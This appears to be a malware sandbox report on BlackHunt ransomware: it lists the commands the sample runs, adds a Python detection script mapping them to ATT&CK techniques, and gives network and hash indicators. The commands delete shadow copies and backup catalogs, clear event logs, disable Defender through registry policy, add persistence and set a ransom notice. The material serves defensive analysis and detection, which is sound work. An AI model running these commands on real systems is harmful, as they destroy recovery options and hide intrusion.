C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2960
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2644
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-44608848942226975-1503731876-2120623488-1811277401-12787588531100136051489308905"1⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2112
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:3992
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:3564
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:3748
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"1⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1768
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:3936
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:3688
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [w4ifO5uDw@gmail.com] AND [Teikobest@gmail.com] " /f1⤵PID:3996
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:3888
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:3752
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3420
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:3412
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:3256
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-403818770-5787790301460639591395378841-258613901864365312-1950163681211449463"1⤵
- Enumerates connected drives
PID:2708
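The process tree above is the whole recovery-inhibition playbook of this sample in plain command lines: shadow copies deleted, shadow storage set to unbounded and then capped at 401MB per volume (capping storage below what the existing snapshots occupy makes VSS discard them, so the pair destroys restore points even where a `Delete Shadows` call is blocked or monitored), WinRE and the System Restore task disabled, the backup catalog and USN journal removed, the four main event logs cleared, and Defender neutered through policy keys. The following is an added detection example, not part of the tria.ge report or the sample: it classifies process-creation command lines against these behaviours with ATT&CK technique IDs and separately flags the unbounded-then-capped shadow storage sequence. The sample events are constructed from the commands in the tree (cmd.exe wrappers included for a few to show they are stripped); the rule names, regexes and the mapping of the legal-notice registry write to T1491.001 are the example's own choices.

```python
import re
from collections import Counter

# Constructed sample events: command lines taken from the process tree above.
SAMPLE_EVENTS = [
    'vssadmin.exe Delete Shadows /all /quiet',
    'vssadmin resize shadowstorage /for=C:\\ /on=C:\\ /maxsize=unbounded',
    'vssadmin resize shadowstorage /for=C:\\ /on=C:\\ /maxsize=401MB',
    'vssadmin resize shadowstorage /for=F:\\ /on=F:\\ /maxsize=unbounded',
    'vssadmin resize shadowstorage /for=F:\\ /on=F:\\ /maxsize=401MB',
    'bcdedit /set {default} bootstatuspolicy IgnoreAllFailures',
    'bcdedit /set {default} recoveryenabled No',
    '"C:\\Windows\\System32\\cmd.exe" /c wbadmin.exe delete catalog -quiet',
    'fsutil.exe usn deletejournal /D C:',
    'fsutil usn deletejournal /D F:\\',
    'wevtutil.exe cl Security',
    'wevtutil.exe cl Application',
    'wevtutil.exe cl System',
    'wevtutil.exe cl Setup',
    'schtasks.exe /Change /TN "\\Microsoft\\Windows\\SystemRestore\\SR" /disable',
    'SCHTASKS.exe /Create /RU "NT AUTHORITY\\SYSTEM" /sc onstart /TN "Windows Critical Update" '
    '/TR "C:\\Users\\Admin\\AppData\\Local\\Temp\\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F',
    'reg add "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" '
    '/v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f',
    'reg add "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction" '
    '/v "High" /t REG_DWORD /d 6 /f',
    'reg add "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
    '/v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\\ProgramData\\#BlackHunt_ReadMe.hta" /f',
    'REG ADD "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" '
    '/v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. " /f',
    '"C:\\Windows\\System32\\cmd.exe" /c ping 127.0.0.1 -n 5',   # delay before self-deletion, not flagged
    'notepad.exe C:\\ProgramData\\#BlackHunt_ReadMe.txt',       # ransom note display, not flagged
]

# Leading '"...\cmd.exe" /c ' or 'cmd /c ' wrapper, removed so parent and child rows match the same rule.
CMD_WRAPPER = re.compile(r'^(?:"[^"]*\\cmd\.exe"|cmd(?:\.exe)?) /c ')

# (rule name, ATT&CK technique, regex over the normalised command line). The first capture
# group, where present, becomes the detail field (log name, maxsize value, ...).
RULES = [(n, t, re.compile(p)) for n, t, p in [
    ("vssadmin_delete_shadows",      "T1490",     r"^vssadmin(?:\.exe)? delete shadows\b"),
    ("vssadmin_resize_shadowstorage", "T1490",    r"^vssadmin(?:\.exe)? resize shadowstorage\b.*/maxsize=(\S+)"),
    ("wbadmin_delete_catalog",       "T1490",     r"^wbadmin(?:\.exe)? delete catalog\b"),
    ("bcdedit_recovery_disabled",    "T1490",     r"^bcdedit(?:\.exe)? /set .*(?:recoveryenabled no|bootstatuspolicy ignoreallfailures)"),
    ("systemrestore_task_disabled",  "T1490",     r"^schtasks(?:\.exe)? /change .*\\systemrestore\\sr\b.* /disable"),
    ("usn_journal_deleted",          "T1070",     r"^fsutil(?:\.exe)? usn deletejournal\b"),
    ("event_log_cleared",            "T1070.001", r"^wevtutil(?:\.exe)? cl (\S+)"),
    ("defender_policy_modified",     "T1562.001", r'^reg(?:\.exe)? add "hk[^"]*\\windows defender\\'),
    ("scheduled_task_as_system",     "T1053.005", r'^schtasks(?:\.exe)? /create .*/ru "?nt authority\\system'),
    ("run_key_added",                "T1547.001", r'^reg(?:\.exe)? add "hk[^"]*\\currentversion\\run"'),
    ("legal_notice_set",             "T1491.001", r'^reg(?:\.exe)? add .*/v "legalnotice(?:text|caption)"'),  # mapping is this example's choice
]]


def normalise(cmdline):
    """Collapse whitespace, lower-case, and strip a cmd.exe /c wrapper."""
    return CMD_WRAPPER.sub("", " ".join(cmdline.split()).lower())


def classify(cmdline):
    """Return [(rule, technique, detail)] for every rule the command line matches."""
    cl = normalise(cmdline)
    hits = []
    for name, technique, pattern in RULES:
        m = pattern.search(cl)
        if m:
            hits.append((name, technique, m.group(1) if m.groups() else ""))
    return hits


def shadow_storage_shrinks(events):
    """Volumes whose shadow storage was set to unbounded and later capped.

    A cap below the space the current snapshots occupy makes VSS discard them,
    so this pair removes restore points without a 'Delete Shadows' command."""
    pat = re.compile(r"^vssadmin(?:\.exe)? resize shadowstorage /for=(\S+) .*?/maxsize=(\S+)")
    seen_unbounded, shrunk = set(), []
    for ev in events:
        m = pat.search(normalise(ev))
        if not m:
            continue
        vol, size = m.group(1), m.group(2)
        if size == "unbounded":
            seen_unbounded.add(vol)
        elif vol in seen_unbounded:
            shrunk.append((vol, size))
    return shrunk


def summarise(events):
    """Count events per technique (one count per event and technique) and list unmatched ones."""
    counts, unmatched = Counter(), []
    for ev in events:
        hits = classify(ev)
        if not hits:
            unmatched.append(ev)
        for technique in {t for _, t, _ in hits}:
            counts[technique] += 1
    return counts, unmatched


if __name__ == "__main__":
    counts, unmatched = summarise(SAMPLE_EVENTS)
    for technique, n in sorted(counts.items()):
        print(f"{technique}: {n}")
    print("shadow storage shrunk on:", shadow_storage_shrinks(SAMPLE_EVENTS))
    print("unmatched:", len(unmatched))
```

Run against Sysmon event ID 1 or Security 4688 command lines, the same rules fire once for the cmd.exe parent and once for the child, which is why `normalise` strips the wrapper; deduplicate on (rule, detail, parent PID) if the double count matters. The `/e:false` appended to one of the `wevtutil cl Security` rows is not a `cl` option, so that row is worth checking in the sandbox output rather than assuming it succeeded.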
Network
- Remote address: 8.8.8.8:53 | Request: ip-api.com IN A | Response: ip-api.com IN A 208.95.112.1
  Traffic counters as reported: 144 B, 52 B, 3, 1
MITRE ATT&CK Enterprise v15 (technique, number of matching signatures)
Persistence
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
- Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
- Bypass User Account Control (1)
- Impair Defenses (2)
- Disable or Modify Tools (2)
- Indicator Removal (4)
- File Deletion (3)
- Modify Registry (5)
Downloads
- Filesize: 1KB
  MD5: d614d08263661f317a7fb840036d7fc2
  SHA1: 8bb0aa39cbe5c6f05a7c09845575780f3307a99e
  SHA256: f7e2aedda6ce538eaf8194b187b56c7a216dd7dc111b99202086b4586c9cc964
  SHA512: f233c8abdb46f06a94fdc96a210b8815406753eca42b58cf3bd2ed98f6ca20d12a70c5136916b2f23bf13535bd41ed72293dd70d15c55e423eb1b7509d670bfa
- Filesize: 12KB
  MD5: 40d6bbad804abb45fd92a42b8aa77668
  SHA1: b2e9e96828e8a385ebcca22a2c1e571c7183f730
  SHA256: 3f3c745f7dede01cbfef77fa405bbf7f27301cce8151dc29a2b75f9f086b860f
  SHA512: fdb8099ab48a259bdbefaad71640c5505cc56caffda50bebfa2e3d88c91df86235736e0f766ce0f50b7c43c4f0caf41ada871643a361c43f8eff2c7647a28977
- Filesize: 684B
  MD5: 85a5c13518f1f6ddefa13598b8bdef33
  SHA1: e65c518a0f845fd082c48d4a39682be0cf4b918c
  SHA256: 5712a2a9d734d4015924c5929376850f5e4cdd63e9a05a644a670d7c8cc93546
  SHA512: 2e73e4f009769effdbc93f1cbe81972e82627234fdd803e89d71903ec80feee33fb3fb20900b1b2dffee693a49497bf3a1e7853690c2e4392e79d46a5eb33ea2